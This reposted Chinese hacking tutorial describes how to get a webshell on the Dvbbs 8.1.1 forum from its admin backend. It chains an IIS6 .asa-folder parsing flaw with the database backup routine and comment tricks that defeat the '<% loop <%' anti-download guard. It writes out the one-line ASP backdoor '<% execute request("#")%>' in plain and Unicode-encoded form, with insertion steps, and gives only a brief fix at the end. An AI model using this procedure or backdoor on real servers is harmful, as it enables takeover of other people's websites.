動網(wǎng)8.1.1版后臺獲取webshell(轉(zhuǎn)載)

[重要通告]如您遇疑難雜癥,本站支持知識付費業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時間哦!

動網(wǎng)8.1.1版后臺獲取webshell
來源:紅狼

文章已發(fā)表于《黑客手冊》0802期

圖/文
Cool_wXd
動網(wǎng)論壇可以說的國內(nèi)ASP論壇界的老大了,在原來的很多版本中,都出現(xiàn)了不同的漏洞,而且獲取webshell也是挺容易的,但是到了8.1.1版本的時候,獲取webshell變得異常的艱難,前一段時間爆出了可以在boke中添加上傳PHP的類型,這個在服務(wù)器可以解析PHP的條件下是可以的!在 8.0版本是數(shù)據(jù)庫的路徑是可以修改的,那個時候可以通過上傳修改成txt格式的數(shù)據(jù)庫文件和木馬文件的捆綁!但是到了8.1.1版本以后,數(shù)據(jù)庫是不允許修改的了,今天下午在紅狼的論壇里看到有朋友在研究后臺獲取webshell的方法,于是我也研究了一下,也就得出了今天這個方法!
首先,怎么獲取后臺管理員賬號和密碼這里我們就不提了,我們直接進入后臺,在備份數(shù)據(jù)庫和恢復(fù)數(shù)據(jù)庫中,我們看到數(shù)據(jù)庫的路徑已經(jīng)修改不了了,如圖

我們來看看源碼,在admin/data.asp中已經(jīng) 而且數(shù)據(jù)庫路經(jīng)設(shè)置是:Dbpath="../"&db,已經(jīng)是直接從conn.asp的配置文件中獲取了用戶所設(shè)置的路徑,所以我們改這個是不可能的了,那么我們就想起了win2003下,iis6的缺陷也就是.asp的文件夾會按照ASP文件方式被執(zhí)行,所以我們將目錄修改成.. /Databackup.asp

但是返回的結(jié)果卻是保存數(shù)據(jù)庫名不合法,必須是有效的MDB文件和文件夾目錄!我們還是看源碼,還是在admin/data.asp中,行621開始的updata函數(shù):
sub updata()

'On error resume next

Dim FileConnStr,Fileconn

Dim Tempbackpath

Dbpath="../"&db

‘獲取數(shù)據(jù)庫路徑

'Dbpath=Replace(request.Form("Dbpath"),chr(0),"")

Dbpath=Server.mappath(Dbpath)

bkfolder=Replace(request.Form("bkfolder"),chr(0),"")

‘備份的目錄

bkdbname=Replace(request.Form("bkdbname"),chr(0),"")

‘備份的名稱

Tempbackpath = bkfolder& "/"& bkdbname
‘將目錄和名稱兩個字符串連接

Rem Add By Dv.唧唧.Net 2007-10-15

If InStr(Lcase(Tempbackpath),".asp")>0 or InStr(Lcase(Tempbackpath),".aspx")>0 or InStr(Lcase(Tempbackpath),".php")>0 Then
‘判斷字符串

response.write "保存數(shù)據(jù)庫名不合法,必須是有效的MDB文件和文件夾目錄!"

Response.End

Exit Sub

End If

If Lcase(Mid(Tempbackpath,instrRev(Tempbackpath,".")+1))<>"mdb" Then

response.write "保存數(shù)據(jù)庫名不合法,必須是有效的MDB文件!"

Response.End

Exit Sub

End If
‘判斷后綴為mdb
我們看到在判斷備份目錄和備份文件名稱時,對字符串中的ASP,ASPX,PHP都做了限制,不過我們知道,ASP和ASA用的都是一個解析器,在理論上創(chuàng)建.asa文件夾也應(yīng)該是可以被執(zhí)行的,好,按照這個思路我們試著備份一下,將將目錄修改成../Databackup.asa,并選備份,返回的是備份數(shù)據(jù)庫成功,您備份的數(shù)據(jù)庫路徑為../Databackup.asa/databack200712311207_65542.mdb,如圖

份通過,所以此時我們的任務(wù)就是尋找論壇可以利用的地方,將我們的一句話木馬插入到數(shù)據(jù)庫中,然后備份。不過還有一個前提就是IIS版本要求為IIS6 的,由于我的機器是XP系統(tǒng),安裝的是IIS5.1的,我就在網(wǎng)上找了一個2003的,首先我們確定IIS版本,在服務(wù)器信息探測中顯示如圖

版本確定以后我們就尋找可以插入木馬的地方吧,但是說到插馬,我們的問題也就又出現(xiàn)了,因為在數(shù)據(jù)庫中DV_notdownload段中的notdown 內(nèi)容為3C25206C6F6F70203C25,也就是ASP語句中的<% loop <%,我們要想讓我們的ASP木馬能夠正常執(zhí)行,首先一個前提就是閉合<% loop <%,關(guān)于這個技術(shù),我們參照邪惡八進制中平安年間的文章《如何突破數(shù)據(jù)庫Loop防下載實例》(地址:https://forum.eviloctal.co...,這篇文章也發(fā)表于< <黑客手冊>>2007年第六期,文章版權(quán)屬于黑客手冊。),這里我們再多說一遍原理,為了閉合<% loop <%,我們要在數(shù)據(jù)庫中尋找合適的位置插入"<%'"和":%>"來構(gòu)造出<%'<% loop <%:%>的結(jié)構(gòu),以此將loop的防下載給過濾掉。但是在我測試過程中發(fā)現(xiàn),由于數(shù)據(jù)庫的所包含數(shù)據(jù)量的不同,在備份出來的數(shù)據(jù)庫中不能形成固定的插入位置把loop防下載過濾掉,但是當(dāng)我們把數(shù)據(jù)庫下載回來并保存為ASP格式以后,可以通過winhex等16進制編輯器來確定<% loop <%所在的位置,并查找出<% loop <%前后的數(shù)據(jù)內(nèi)容,按照順序來進行"<%'"和":%>"的插入,

并把一句話木馬插在注釋語句的前面,這樣我們的一句話木馬才算是插入成功的。在我現(xiàn)在檢測的網(wǎng)站上,經(jīng)過多次的測試,終于得到了想要的效果,大家看我演示就好了。這里找好了一個地方,就是個性圈子管理中(其實其他地方也是可以的,我也是慢慢試出來的,這里我用這個地方演示),然后按照如圖方式添加一個圈子,在圈子名稱處,寫入:┼攠數(shù)畣整爠煥敵瑳∨∣┩愾┼砧(“┼攠數(shù)畣整爠煥敵瑳∨∣┩愾┼砧”就是<% execute request("#")%>a<%'x”轉(zhuǎn)換成Unicode字符以后的結(jié)果。) 然后再模板管理處中的添加/編輯自定義標(biāo)簽,我們對login標(biāo)簽進行修改: 在模板_主體標(biāo)記部分前面添加┠礫(“┠礫”就是%>x轉(zhuǎn)換成Unicode字符以后的結(jié)果。),這樣我們不僅將<% loop <%注釋掉了,同時也將我們一句話木馬寫入了注釋的前面,接下來就是笨份數(shù)據(jù)庫,生成以.asa為文件夾的數(shù)據(jù)庫路徑了,這里就不截圖了,我們直接運行這個文件,如圖所示 沒有出現(xiàn)%>不閉合的現(xiàn)象,同時也證明了我們的一句話木馬正確地插入了!接下來就是一句話木馬連接了

不過這種插入數(shù)據(jù)庫的方法不見得在每一個論壇上都是通用的,朋友們需要通過對數(shù)據(jù)庫前后內(nèi)容進行分析才可以進行插馬的,不過這個方法在獲取 webshell 上確實是成立的,希望朋友們能好好測試一下。我想這篇文章寫到這里已經(jīng)算是結(jié)束了,但是在利用上也是利用了IIS6的缺陷和動網(wǎng)在生成目錄上過濾不嚴(yán)格導(dǎo)致的!至于這個漏洞的修復(fù),只需將
If InStr(Lcase(Tempbackpath),".asp")>0 or InStr(Lcase(Tempbackpath),".aspx")>0 or InStr(Lcase(Tempbackpath),".php")>0 Then
中繼續(xù)添加其他的由于IIS6缺陷所造成的執(zhí)行錯誤!好的,文章就寫到這里了,如果大家有什么疑問可以和我聯(lián)系,我的QQ:15872896.

問題未解決?付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信

所寫所說,是心之所感,思之所悟,行之所得;文當(dāng)無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!

支付寶贊助
微信贊助

免責(zé)聲明,若由于商用引起版權(quán)糾紛,一切責(zé)任均由使用者承擔(dān)。

您必須遵守我們的協(xié)議,如您下載該資源,行為將被視為對《免責(zé)聲明》全部內(nèi)容的認(rèn)可->聯(lián)系老梁投訴資源
LaoLiang.Net部分資源來自互聯(lián)網(wǎng)收集,僅供用于學(xué)習(xí)和交流,請勿用于商業(yè)用途。如有侵權(quán)、不妥之處,請聯(lián)系站長并出示版權(quán)證明以便刪除。 敬請諒解! 侵權(quán)刪帖/違法舉報/投稿等事物聯(lián)系郵箱:service@laoliang.net
意在交流學(xué)習(xí),歡迎贊賞評論,如有謬誤,請聯(lián)系指正;轉(zhuǎn)載請注明出處: » 動網(wǎng)8.1.1版后臺獲取webshell(轉(zhuǎn)載)

發(fā)表回復(fù)

本站承接,網(wǎng)站推廣(SEM,SEO);軟件安裝與調(diào)試;服務(wù)器或網(wǎng)絡(luò)推薦及配置;APP開發(fā)與維護;網(wǎng)站開發(fā)修改及維護; 各財務(wù)軟件安裝調(diào)試及注冊服務(wù)(金蝶,用友,管家婆,速達(dá),星宇等);同時也有客戶管理系統(tǒng),人力資源,超市POS,醫(yī)藥管理等;

立即查看 了解詳情